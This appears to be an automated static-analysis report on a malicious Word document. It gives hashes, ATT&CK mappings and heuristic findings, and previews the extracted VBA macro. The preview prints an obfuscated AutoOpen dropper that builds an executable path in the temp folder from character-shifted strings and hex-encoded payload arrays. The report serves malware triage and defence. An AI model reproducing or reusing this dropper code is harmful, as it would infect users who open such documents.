Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b424d75445b3dab…

MALICIOUS

Office (OLE)

7.07 MB Created: 2018-03-01 17:44:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 233ad743dd26c959fa735ffbaa456c05 SHA-1: e47f845c3ba2c487ccc8319c36de1587592ac0d6 SHA-256: 6b424d75445b3dabfb9b20895d0a1ce1430066ce7f3fcd87aa41fa32260ff92d
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The AutoOpen macro attempts to decode a string, which when decoded, appears to be a filename 'SvoujnfCsplfs.exe'. It then concatenates this with the user's temporary directory to form a full path for execution. This indicates the macro's primary purpose is to download and execute a second-stage payload.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.ccct.com.au In document text (OLE body)
    • http://www.hnlaw.com.auIn document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/iX/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/pdf/1.3/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.microsoft.com/office/2006/coverPagePropsIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3815369 bytes
SHA-256: ef0d668efdf32feece8ec0f1bea13562c7f8286b97a9d07faeb89720b87309a4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1960 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    
    On Error GoTo gaqz
    
    liveOn = "SvoujnfCsplfs/fyf"
    
    liveOff = Environ("temp") + "\"
    For qnx = 1 To Len(liveOn)
        liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
    Next
    
    Dim str(430) As String

    str(1) = "AABD77E7E4E7E7E7E3E7E7E71818E7E75FE7E7E7E7E7E7E7A7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E717E7E7E7E9F85DE9E753EE2AC65FE6AB2AC6B38F8E94C79795888095868AC7848689898893C78582C7959289C78E89C7A3A8B4C78A888382C9EAEAEDC3E7E7E7E7E7E7E75A53417E1E322F2D1E322F2D1E322F2D05AFB32D1C322F2D05AFB12D1B322F2D05AF852D0D322F2D05AF842D1C322F2D174AAC2D1D322F2D174ABC2D0B322F2D1E322E2DA7322F2D05AF802D2F322F2D05AFB22D1F322F2DB58E848F1E322F2DE7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7B7A2E7E7ABE6E2E7297064BDE7E7E7E7E7E7E7E707E7E5E6ECE6EDE7E735E5E7E797E7E7E7E7E7E7C73DE5E7E7F7E7E7E717E5E7E7E7A7E7E7F7E7E7E7E5E7E7E2E7E6E7E7E7E7E7E2E7E6E7E7E7E7E7E707E4E7E7E3E7E76B9DE4E7E5E7A766E7E7F7E7E7F7E7E7E7E7F7E7E7F7E7E7E7E7E7E7F7E7E7E7E7E7E7E7E7E7E7E757D1E4E717E7E7E7E757E4E753E6E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E727E4E78FF5E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E72FD2E4E7A7E7E7E7E7E7E7E7E7E7E7E7E717E5E77FE5E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7C993829F93E7E7E70037E5E7"
    str(2) = "E7F7E7E7E735E5E7E7E3E7E7E7E7E7E7E7E7E7E7E7E7E7E7C7E7E787C99583869386E7E76DB3E7E7E717E5E7E7B1E7E7E731E5E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E7A7C983869386E7E7E76BB9E7E7E7B7E4E7E7E5E7E7E7CBE4E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E727C995949584E7E7E753E6E7E7E757E4E7E7E5E7E7E7C9E4E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E7A7C995828B8884E7E791F2E7E7E727E4E7E7F1E7E7E7D7E4E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E7A5E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7"
    str(3) = "E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7B26C0B640B87D427B18DA3B76EA20B6EA2176EA2136EA21F6AA243B70FCC37E5E76423EBD42E6AB20BB56AA243B7B6B6B6B6B6B6816EAA336CAAEFB68DE720A237E6E7E7E720A243A3E7E7E718F2FF16A5E7622799F96CB2176CD2F716A5E7B518316CA20BB718315F80181818B96C02BA25E3E75FF6E7E7E7B96C02BA25E3E76D6699E6E7E7DBE492E9DF6698E6E7E795E15FE6E7E7E724DB1992EE675E98E6E7E71A910AD427242B2B2B2B2B2B2B2BB26C0BB4B08F1FE7E7E78DE7B10F6D28E5E76CA2EF6CFAE716A5E76423EB6EE15FE6E7E7E76AA9E3B66EA1FB6E91A320A18F13E6E7E76FA1BF1834469742A4E75D67E7E7E7816EB1BD20A1BBC74AA7E720A187374AA7E78D97622793E318370CE118F24F16A5E76C1F6423E3621893F48D978DE7B00FC528E5E76423EB6AA0B7B718346C20103FFC276E99DBC280E6E7E7B8E27E191818BCBA242B2B2B2B2B2B6CE0B46CFA4316A5E7B16CD29342A4E7622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0A7622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0CF622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0C7622793E9B7621193E318310CE518346423E36A90DF0FB249E7E76A90D70FAA49E7E76A90D30FA249E7E76C"
    str(4) = "90DB621193CDB10F7FFCE6E76423E36AA1B7B718F21317A5E7469342A4E7B1622793EF18376423E3B9BC2418346423E3B9BC242B6CA0DFB46CFA4316A5E7B16CD29342A4E7622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0AF622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0DB622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0AB622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0A7622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0B7622793F5B7621193EF18316423E3B9BC2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.